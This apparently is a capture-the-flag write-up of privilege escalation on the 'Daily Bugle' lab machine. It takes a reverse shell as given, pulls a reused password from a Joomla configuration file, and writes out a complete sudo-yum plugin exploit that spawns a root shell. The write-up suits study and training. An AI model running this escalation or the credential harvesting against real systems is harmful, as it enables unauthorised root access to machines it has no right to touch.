Skip to main content

Daily Bugle

Privilege Escalation

  • We can catch the Reverse Shell Using netcat
apache@dailybugle /$  id
uid=48(apache) gid=48(apache) groups=48(apache)

  • Enumerating through Various Files we Found the Password for one of the Users on the System: jjameson
  • File Location: /var/www/html/configuration.php
  • Password: nv5uz9r3ZEDzVjNu
class JConfig {
public $user = 'jjameson';
public $password = 'nv5uz9r3ZEDzVjNu';
}

  • Using the Found Credentials to Switch User: jjameson:nv5uz9r3ZEDzVjNu
  • The User jjameson can run: /usr/bin/yum as ROOT
[jjameson@dailybugle ~]$ id
uid=1000(jjameson) gid=1000(jjameson) groups=1000(jjameson)
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum

  • Using /usr/bin/yum to Escalate Privileges.
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
> os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
[root@dailybugle ~]$ id
uid=0(root) gid=0(root) groups=0(root)